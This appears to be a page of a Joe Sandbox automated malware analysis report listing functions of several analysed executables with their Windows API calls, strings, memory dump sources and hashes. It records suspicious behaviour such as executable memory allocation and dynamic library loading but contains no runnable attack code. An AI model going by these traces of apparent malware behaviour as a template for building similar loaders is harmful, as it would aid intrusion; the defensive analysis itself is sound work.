Memory Dump Source

Source File: 00000004.00000002.2333978466.00007FFE1A511000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE1A510000, based on PE: true

Associated: 00000004.00000002.2333956640.00007FFE1A510000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2334033162.00007FFE1A522000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2334058779.00007FFE1A52D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2334109814.00007FFE1A52F000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffe1a510000_RgZ5EJ.jbxd

Similarity

API ID: CodeInfoPageValid
String ID: Rcl^i
API String ID: 546120528-2241636769
Opcode ID: 01a8b8e5be3f2da18da0fa4b8c6d6004a2b1713cb20b8db31c20b2e0990c257f
Instruction ID: 512dce8de32551e6be36a6f948a14d53972bd77b9ebb97676c3dd2b6e8e23f10
Opcode Fuzzy Hash: 01a8b8e5be3f2da18da0fa4b8c6d6004a2b1713cb20b8db31c20b2e0990c257f
Instruction Fuzzy Hash: F881D162B0CE8282EB249F27A05417D76A3EB46F60F4A41F7D69E476B1DE3CE955C300

Function 00007FFE1A519F74 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 179COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FFE1A519FA4

Part of subcall function 00007FFE1A5179FC: IsProcessorFeaturePresent.KERNEL32(?,?,?,?,00007FFE1A5179AB,?,?,?,?,?,00007FFE1A517896), ref: 00007FFE1A517A05
Part of subcall function 00007FFE1A5179FC: GetCurrentProcess.KERNEL32(?,?,?,?,00007FFE1A5179AB,?,?,?,?,?,00007FFE1A517896), ref: 00007FFE1A517A2A

Strings

Rcl^i, xrefs: 00007FFE1A51A356
*?, xrefs: 00007FFE1A519FCF

Memory Dump Source

Source File: 00000004.00000002.2333978466.00007FFE1A511000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE1A510000, based on PE: true

Associated: 00000004.00000002.2333956640.00007FFE1A510000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2334033162.00007FFE1A522000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2334058779.00007FFE1A52D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2334109814.00007FFE1A52F000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffe1a510000_RgZ5EJ.jbxd

Similarity

API ID: CurrentFeaturePresentProcessProcessor_invalid_parameter_noinfo
String ID: *?$Rcl^i
API String ID: 4036615347-2727823567
Opcode ID: 03ca5b0c4e322d623fda892a6410b457a50f6843096a4ac4402b87193dc3e6ad
Instruction ID: 29b3909d61c87066b804fe0f9577cfd415a2f3d7d1af60fef06cbb3229558efb
Opcode Fuzzy Hash: 03ca5b0c4e322d623fda892a6410b457a50f6843096a4ac4402b87193dc3e6ad
Instruction Fuzzy Hash: A3518F62B1CE5249EB229A6799512BD27D2AB46FF4F0445B3DF0D07BA6DE3CE4818300

Function 00007FFE1A515C00 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 163COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 00007FFE1A515C2A

Strings

csm, xrefs: 00007FFE1A515DBE
csm, xrefs: 00007FFE1A515C4F

Memory Dump Source

Source File: 00000004.00000002.2333978466.00007FFE1A511000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE1A510000, based on PE: true

Associated: 00000004.00000002.2333956640.00007FFE1A510000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2334033162.00007FFE1A522000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2334058779.00007FFE1A52D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2334109814.00007FFE1A52F000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffe1a510000_RgZ5EJ.jbxd

Similarity

API ID: __except_validate_context_record
String ID: csm$csm
API String ID: 1467352782-3733052814
Opcode ID: 7b854735182fbbf9032f6bb379489979c6e7540e10eb2e5c3fda445f13d9ec39
Instruction ID: cc163d2ed52992b12ccb5b176fd598443197ca996c9be1a7dd019399f5a25fae
Opcode Fuzzy Hash: 7b854735182fbbf9032f6bb379489979c6e7540e10eb2e5c3fda445f13d9ec39
Instruction Fuzzy Hash: 79718272B0CA818AD7608F26D444B7D7BA2EB06FA8F1881F6DE4C47AA5CB3CD551C740

Function 00007FFE1A51AC58 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 128COMMON

Download Yara Rule

APIs

GetCPInfo.KERNEL32 ref: 00007FFE1A51AC9A

Strings

, xrefs: 00007FFE1A51ACDD
Rcl^i, xrefs: 00007FFE1A51AC72

Memory Dump Source

Source File: 00000004.00000002.2333978466.00007FFE1A511000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE1A510000, based on PE: true

Associated: 00000004.00000002.2333956640.00007FFE1A510000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2334033162.00007FFE1A522000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2334058779.00007FFE1A52D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2334109814.00007FFE1A52F000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffe1a510000_RgZ5EJ.jbxd

Similarity

API ID: Info
String ID: $Rcl^i
API String ID: 1807457897-2482546866
Opcode ID: 71d96838d63d5bd156253c32fbb239cbfea04232ccba32b8992805db2b9f41af
Instruction ID: 6c46fc792daae250010c03d9b513453ff4bec7e472d2b596f1e0997a76d5a347
Opcode Fuzzy Hash: 71d96838d63d5bd156253c32fbb239cbfea04232ccba32b8992805db2b9f41af
Instruction Fuzzy Hash: 99519E72B1CAC18AE7228F25D0842BD7BE1F74AB58F5441BAE78D47A96CB3CD145CB40

Function 00007FFE1A516298 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 120COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 00007FFE1A516342
_CreateFrameInfo.LIBVCRUNTIME ref: 00007FFE1A51636B

Strings

csm, xrefs: 00007FFE1A51646B

Memory Dump Source

Source File: 00000004.00000002.2333978466.00007FFE1A511000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE1A510000, based on PE: true

Associated: 00000004.00000002.2333956640.00007FFE1A510000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2334033162.00007FFE1A522000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2334058779.00007FFE1A52D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2334109814.00007FFE1A52F000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffe1a510000_RgZ5EJ.jbxd

Similarity

API ID: CreateFrameInfo__except_validate_context_record
String ID: csm
API String ID: 2558813199-1018135373
Opcode ID: fdc43af78747129a673bd1320e44d2e2152711131f73500a528a0e9cffec3944
Instruction ID: 17a6df69f5b8bd89d9d2f92c59730d1f10af3a9a6bddec5e78e0965cb6eeaf45
Opcode Fuzzy Hash: fdc43af78747129a673bd1320e44d2e2152711131f73500a528a0e9cffec3944
Instruction Fuzzy Hash: 71514D3671DB4196D660AF16A04127D7BA5FB8AFB0F1005B6EB8D07B66DF38E451CB00

Function 00007FFE1A51E970 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 77fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNEL32 ref: 00007FFE1A51EA3A
GetLastError.KERNEL32 ref: 00007FFE1A51EA56

Strings

Rcl^i, xrefs: 00007FFE1A51E98B

Memory Dump Source

Source File: 00000004.00000002.2333978466.00007FFE1A511000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE1A510000, based on PE: true

Associated: 00000004.00000002.2333956640.00007FFE1A510000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2334033162.00007FFE1A522000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2334058779.00007FFE1A52D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2334109814.00007FFE1A52F000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffe1a510000_RgZ5EJ.jbxd

Similarity

API ID: ErrorFileLastWrite
String ID: Rcl^i
API String ID: 442123175-2241636769
Opcode ID: eadc99cea0851e8feb27075dd19d2e383d734a2ee041235ba89007452d8df712
Instruction ID: 277fcab9a114bbfc706bbd9e793a4a7b95d896f6153590e8e9e38d25e6325de3
Opcode Fuzzy Hash: eadc99cea0851e8feb27075dd19d2e383d734a2ee041235ba89007452d8df712
Instruction Fuzzy Hash: 3B31AFB2B18A4196DB109F26E8842B973A1FB49B94F4480B3EF4D83764EF3CD456DB00

Function 00007FFE1A51E86C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 74fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNEL32 ref: 00007FFE1A51E91F
GetLastError.KERNEL32 ref: 00007FFE1A51E93B

Strings

Rcl^i, xrefs: 00007FFE1A51E887

Memory Dump Source

Source File: 00000004.00000002.2333978466.00007FFE1A511000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE1A510000, based on PE: true

Associated: 00000004.00000002.2333956640.00007FFE1A510000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2334033162.00007FFE1A522000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2334058779.00007FFE1A52D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2334109814.00007FFE1A52F000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffe1a510000_RgZ5EJ.jbxd

Similarity

API ID: ErrorFileLastWrite
String ID: Rcl^i
API String ID: 442123175-2241636769
Opcode ID: a0d96b4ca08a6004f26050b6a53b51cc3a6312a913a36c2304622594e22a231b
Instruction ID: 7bc5b1f8156a739f6565e4d4069af61c44b4b8c095cdbade821c227d6ba0c3b1
Opcode Fuzzy Hash: a0d96b4ca08a6004f26050b6a53b51cc3a6312a913a36c2304622594e22a231b
Instruction Fuzzy Hash: 9831C2B270CE819AD7509F26E4402B977A2FB5ABA0F4440B3EE8D43724EE3CD516DB00

Function 0000000140012523 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 69COMMON

Download Yara Rule

APIs

RaiseException.KERNEL32 ref: 000000014001256D
RaiseException.KERNEL32 ref: 000000014001258A

Strings

csm, xrefs: 00000001400125BE

Memory Dump Source

Source File: 00000004.00000002.2333771831.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000004.00000002.2333728891.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2333822437.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2333852745.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2333906389.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_140000000_RgZ5EJ.jbxd

Similarity

API ID: ExceptionRaise
String ID: csm
API String ID: 3997070919-1018135373
Opcode ID: dba88b77ed38871436108f768fa7b3f2c7bfcf036fc2a4a051b753ac1ce5513b
Instruction ID: 49e9958dea4625aba6399e71a496f31833793ec74c7c4936f150dd50c3eb5df3
Opcode Fuzzy Hash: dba88b77ed38871436108f768fa7b3f2c7bfcf036fc2a4a051b753ac1ce5513b
Instruction Fuzzy Hash: 1D315036204A8082D771CF16E09079EB365F78C7E4F544111EF9A077B5DB3AD892CB41

Function 00007FFE1A51A84C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 67COMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32 ref: 00007FFE1A51A887
GetLastError.KERNEL32 ref: 00007FFE1A51A891

Strings

Rcl^i, xrefs: 00007FFE1A51A866

Memory Dump Source

Source File: 00000004.00000002.2333978466.00007FFE1A511000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE1A510000, based on PE: true

Associated: 00000004.00000002.2333956640.00007FFE1A510000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2334033162.00007FFE1A522000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2334058779.00007FFE1A52D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2334109814.00007FFE1A52F000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffe1a510000_RgZ5EJ.jbxd

Similarity

API ID: ErrorFileLastModuleName
String ID: Rcl^i
API String ID: 2776309574-2241636769
Opcode ID: b28f0970bfca53eba4bc45633662badc7943a5ac6602eb7d9328af2c4ca6312c
Instruction ID: 86cb0deed00c6e6ffd073a1488ca70542d01cae739eb95d4f2c679267c1c654d
Opcode Fuzzy Hash: b28f0970bfca53eba4bc45633662badc7943a5ac6602eb7d9328af2c4ca6312c
Instruction Fuzzy Hash: 8131833270CB8196E7618B26E4407B967A5FB86BA4F5501B6DBCC43AA8DF3CD581CB00

Function 00007FFE1A520910 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 64COMMON

Download Yara Rule

APIs

Part of subcall function 00007FFE1A513A38: __except_validate_context_record.LIBVCRUNTIME ref: 00007FFE1A513A63

__GSHandlerCheckCommon.LIBCMT ref: 00007FFE1A520993

Strings

csm, xrefs: 00007FFE1A52092B
f, xrefs: 00007FFE1A520925

Memory Dump Source

Source File: 00000004.00000002.2333978466.00007FFE1A511000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE1A510000, based on PE: true

Associated: 00000004.00000002.2333956640.00007FFE1A510000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2334033162.00007FFE1A522000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2334058779.00007FFE1A52D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2334109814.00007FFE1A52F000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffe1a510000_RgZ5EJ.jbxd

Similarity

API ID: CheckCommonHandler__except_validate_context_record
String ID: csm$f
API String ID: 1543384424-629598281
Opcode ID: df4735a4e908aa111fba586a5857847e844898d503be1ccfbed92f1abe6d2401
Instruction ID: 4767d3139cfe538b553dffc3081010f9f75b09a9a966cdfcf56a0960c06ceb7d
Opcode Fuzzy Hash: df4735a4e908aa111fba586a5857847e844898d503be1ccfbed92f1abe6d2401
Instruction Fuzzy Hash: 9211E172B18B81C5E7549F23A0411B97B66EB46FE0F0880B6EE880BB66CE38DC51C700

Function 0000000140003620 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 45timeCOMMON

Download Yara Rule

APIs

SetWaitableTimer.KERNEL32 ref: 0000000140003665
#4.VSELOG ref: 00000001400036AC

Strings

amps_Set: pHandle=%p, propId=%d, val=%p, vSize=%d, xrefs: 000000014000368F

Memory Dump Source

Source File: 00000004.00000002.2333771831.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000004.00000002.2333728891.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2333822437.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2333852745.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2333906389.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_140000000_RgZ5EJ.jbxd

Similarity

API ID: TimerWaitable
String ID: amps_Set: pHandle=%p, propId=%d, val=%p, vSize=%d
API String ID: 1823812067-484248852
Opcode ID: 590ed17bb6164494f623543e183e49ebce91c212c09f63c64337d20ba62503d7
Instruction ID: 814455377fd743a09d1ce94c7697c2570c7384a68551c8a3e3690f56dccab0e4
Opcode Fuzzy Hash: 590ed17bb6164494f623543e183e49ebce91c212c09f63c64337d20ba62503d7
Instruction Fuzzy Hash: 25114975608B4082EB21CF16B84079AB7A4F79DBD4F544225FF8847B79DB39C5508B40

Function 00007FFE1A513990 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMONLIBRARYCODE

Download Yara Rule

APIs

RtlPcToFileHeader.KERNEL32(?,?,?,?,?,?,?,?,?,00007FFE1A51112F), ref: 00007FFE1A5139E0
RaiseException.KERNEL32(?,?,?,?,?,?,?,?,?,00007FFE1A51112F), ref: 00007FFE1A513A21

Strings

csm, xrefs: 00007FFE1A513A0E

Memory Dump Source

Source File: 00000004.00000002.2333978466.00007FFE1A511000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE1A510000, based on PE: true

Associated: 00000004.00000002.2333956640.00007FFE1A510000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2334033162.00007FFE1A522000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2334058779.00007FFE1A52D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2334109814.00007FFE1A52F000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffe1a510000_RgZ5EJ.jbxd

Similarity

API ID: ExceptionFileHeaderRaise
String ID: csm
API String ID: 2573137834-1018135373
Opcode ID: 886c576564c2cc2de453fb1cc39b3a925429a78efbd1798258f32c7f13ed655c
Instruction ID: 5d0314be8a28072ba4f3b46a76935b8f9882d3f4705911f625d1c289e4b4dd63
Opcode Fuzzy Hash: 886c576564c2cc2de453fb1cc39b3a925429a78efbd1798258f32c7f13ed655c
Instruction Fuzzy Hash: E1114C3660CF8182EB608F16E4102797BE5FB89BA4F5842B2DE8D07769EF3CD5518B00

Function 00000001400036E0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 39timeCOMMON

Download Yara Rule

APIs

SetWaitableTimer.KERNEL32 ref: 0000000140003725
#4.VSELOG ref: 0000000140003762

Strings

amps_Get: pHandle=%p, propId=%d, val=%p, vSize=%d, xrefs: 0000000140003745

Memory Dump Source

Source File: 00000004.00000002.2333771831.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000004.00000002.2333728891.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2333822437.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2333852745.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2333906389.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_140000000_RgZ5EJ.jbxd

Similarity

API ID: TimerWaitable
String ID: amps_Get: pHandle=%p, propId=%d, val=%p, vSize=%d
API String ID: 1823812067-3336177065
Opcode ID: ec5ea581405e177efc46dfcfb63def396c6c184119c2e2df6ecfca0784b7c7fe
Instruction ID: 709d983207ec740d9f2c7308925ee729c80a4ac6442fb255827ec98b57545574
Opcode Fuzzy Hash: ec5ea581405e177efc46dfcfb63def396c6c184119c2e2df6ecfca0784b7c7fe
Instruction Fuzzy Hash: 731170B2614B8082D711CF16F480B9AB7A4F38CBE4F444216BF9C47B68CF78C5508B40

Function 00000001400137D0 Relevance: 5.0, APIs: 4, Instructions: 27memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 00000001400137EB
HeapFree.KERNEL32 ref: 00000001400137FD
GetProcessHeap.KERNEL32 ref: 0000000140013820
HeapFree.KERNEL32 ref: 0000000140013832

Memory Dump Source

Source File: 00000004.00000002.2333771831.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000004.00000002.2333728891.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2333822437.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2333852745.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2333906389.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_140000000_RgZ5EJ.jbxd

Similarity

API ID: Heap$FreeProcess
String ID:
API String ID: 3859560861-0
Opcode ID: 57607852ce15da45032583eecf595b266eb818b51a75700467a9fc2c410260bf
Instruction ID: 86a4b35954e85bb75ec39e114bccfc50e282ec3ca0152174d73c8df7cd9b4be4
Opcode Fuzzy Hash: 57607852ce15da45032583eecf595b266eb818b51a75700467a9fc2c410260bf
Instruction Fuzzy Hash: ADF07FB4615B4481FB078FA7B84479422E5EB4DBC0F481028AB494B3B0DF7A80998710

Analysis Process: YYAfLM.exePID: 5212, Parent PID: 7228COMMON

Executed Functions

Function 0183017F Relevance: 2.8, APIs: 2, Instructions: 267memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(00000000,?,00001000,00000040), ref: 018301DF

Memory Dump Source

Source File: 00000027.00000003.3157970679.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_39_3_1830000_YYAfLM.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 173a0753eb1870a11fb702d1a013be029f39be02b255bbe32865f3a9974466fd
Instruction ID: 718cb972af8a29cdfa8f66d3655ecc226930123645864b877a60e152bfdf3582
Opcode Fuzzy Hash: 173a0753eb1870a11fb702d1a013be029f39be02b255bbe32865f3a9974466fd
Instruction Fuzzy Hash: 52A13A71A00606EFDB15CFA9C880AAEBBB5FF88308F188169E515DB751D770EB51CB90

Function 0183044B Relevance: 2.6, APIs: 2, Instructions: 75memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 0183048B
VirtualFree.KERNELBASE(?,?,00004000), ref: 018304F1

Memory Dump Source

Source File: 00000027.00000003.3157970679.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_39_3_1830000_YYAfLM.jbxd

Similarity

API ID: Virtual$AllocFree
String ID:
API String ID: 2087232378-0
Opcode ID: 85e613f023628dd9a35c971c8f35ac366b6d7af4f068bcc7d0f9ba1c9b2aec73
Instruction ID: ab94b3f92e151953623b43a7a69f897924d20548b367a3c3b7263ce2e2ea92a3
Opcode Fuzzy Hash: 85e613f023628dd9a35c971c8f35ac366b6d7af4f068bcc7d0f9ba1c9b2aec73
Instruction Fuzzy Hash: F621DE75500705BBD7219E988CC4FAFFBF99F84318F144468FB5AF2681D671970096E1

Non-executed Functions

Function 018300CD Relevance: 2.6, Strings: 2, Instructions: 62COMMON

Download Yara Rule

Strings

l, xrefs: 01830149
ntdl, xrefs: 01830142

Memory Dump Source

Source File: 00000027.00000003.3157970679.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_39_3_1830000_YYAfLM.jbxd

Similarity

API ID:
String ID: l$ntdl
API String ID: 0-924918826
Opcode ID: 6c9c6db97d8771c7cf8e0db104e1040736491d6c0939765109556fa2b78a9631
Instruction ID: 544afecd4e08bdc917c3ae2c627587311298aef5ea7d63606d6a2dcbba61dbf4
Opcode Fuzzy Hash: 6c9c6db97d8771c7cf8e0db104e1040736491d6c0939765109556fa2b78a9631
Instruction Fuzzy Hash: 5A118BB5700A02AFCB15AF58C418A0EFBF6FF88710B258159E009D7710EB34AA218BD6

Function 01830643 Relevance: 2.6, Strings: 2, Instructions: 55COMMON

Download Yara Rule

Strings

ntdl, xrefs: 01830684
l, xrefs: 0183068E

Memory Dump Source

Source File: 00000027.00000003.3157970679.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_39_3_1830000_YYAfLM.jbxd

Similarity

API ID:
String ID: l$ntdl
API String ID: 0-924918826
Opcode ID: 0c2c30aec7a625bf31c8c356953fe1e8142b6a83dabfcff9fbbd6bac14ed309e
Instruction ID: 72974b714fb0c7b76a15dd25cf2bdca25af08007d4171bc03a6966535c1f778f
Opcode Fuzzy Hash: 0c2c30aec7a625bf31c8c356953fe1e8142b6a83dabfcff9fbbd6bac14ed309e
Instruction Fuzzy Hash: 15015E71B00215ABCB04DB99C8459AEFBA9EF98754F144099F914A7361EA70DE009BA2

Analysis Process: XKXK7Ueky.exePID: 6104, Parent PID: 1044COMMON

Execution Graph

Execution Coverage:	6%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	1.3%
Total number of Nodes:	1048
Total number of Limit Nodes:	29

Executed Functions

Function 002C1000 Relevance: 29.8, APIs: 13, Strings: 4, Instructions: 73
libraryloadersynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CoInitialize.OLE32(00000000), ref: 002C1006
CreateMutexW.KERNELBASE(00000000,00000000,Global\IEToolbarUninstaller), ref: 002C1013
GetLastError.KERNEL32 ref: 002C101F
GetCommandLineW.KERNEL32(?), ref: 002C1040
CommandLineToArgvW.SHELL32(00000000), ref: 002C1047
PathFileExistsW.KERNELBASE(tbcore3.dll), ref: 002C1061
PathFileExistsW.KERNELBASE(tbcore3U.dll), ref: 002C1073
LoadLibraryW.KERNELBASE(?), ref: 002C1085
GetProcAddress.KERNEL32(00000000,MyUnregisterServer), ref: 002C1097
FreeLibrary.KERNELBASE(00000000), ref: 002C10A4
CloseHandle.KERNELBASE(00000000), ref: 002C10AB
CoUninitialize.COMBASE ref: 002C10B1
LocalFree.KERNEL32(00000000), ref: 002C10BC

Strings

Global\IEToolbarUninstaller, xrefs: 002C100C
tbcore3.dll, xrefs: 002C105C, 002C1067
MyUnregisterServer, xrefs: 002C1091
tbcore3U.dll, xrefs: 002C106E, 002C1079

Memory Dump Source

Source File: 00000029.00000002.3176545780.00000000002C1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 002C0000, based on PE: true

Associated: 00000029.00000002.3176512058.00000000002C0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000029.00000002.3176579274.00000000002C8000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000029.00000002.3176608493.00000000002CA000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000029.00000002.3176635430.00000000002CC000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_41_2_2c0000_XKXK7Ueky.jbxd

Similarity

API ID: CommandExistsFileFreeLibraryLinePath$AddressArgvCloseCreateErrorHandleInitializeLastLoadLocalMutexProcUninitialize
String ID: Global\IEToolbarUninstaller$MyUnregisterServer$tbcore3.dll$tbcore3U.dll
API String ID: 474438367-4110843154
Opcode ID: ab60951c1ddff479fdd123cfa3064f2d930ed4d48e9b2742bc8864dab9d9f537
Instruction ID: a922114359d624af297f4a99ac24912b01d9e980eef3476962d879425c76c1f8
Opcode Fuzzy Hash: ab60951c1ddff479fdd123cfa3064f2d930ed4d48e9b2742bc8864dab9d9f537
Instruction Fuzzy Hash: 6811B4325152A6EB93205F60BC0DFAF379CFE46751B05861DF946D2051CF618865CBF2

Function 002C1465 Relevance: 3.0, APIs: 2, Instructions: 8
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

___crtCorExitProcess.LIBCMT ref: 002C146D

Part of subcall function 002C143A: GetModuleHandleW.KERNEL32(mscoree.dll,?,002C1472,?,?,002C54EE,000000FF,0000001E,?,002C36FC,?,00000001,?,?,002C2A2A,00000018), ref: 002C1444
Part of subcall function 002C143A: GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 002C1454

ExitProcess.KERNEL32 ref: 002C1476

Memory Dump Source

Source File: 00000029.00000002.3176545780.00000000002C1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 002C0000, based on PE: true

Associated: 00000029.00000002.3176512058.00000000002C0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000029.00000002.3176579274.00000000002C8000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000029.00000002.3176608493.00000000002CA000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000029.00000002.3176635430.00000000002CC000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_41_2_2c0000_XKXK7Ueky.jbxd

Similarity

API ID: ExitProcess$AddressHandleModuleProc___crt
String ID:
API String ID: 2427264223-0
Opcode ID: 55ead5971eeaddd82622bb03bf308ea6668917e5d74f1f6b09414900a772aa58
Instruction ID: 213ecad74198a4bf4a385e5cfd22d2e638e400efeeea72ebed9118034b981ecc
Opcode Fuzzy Hash: 55ead5971eeaddd82622bb03bf308ea6668917e5d74f1f6b09414900a772aa58
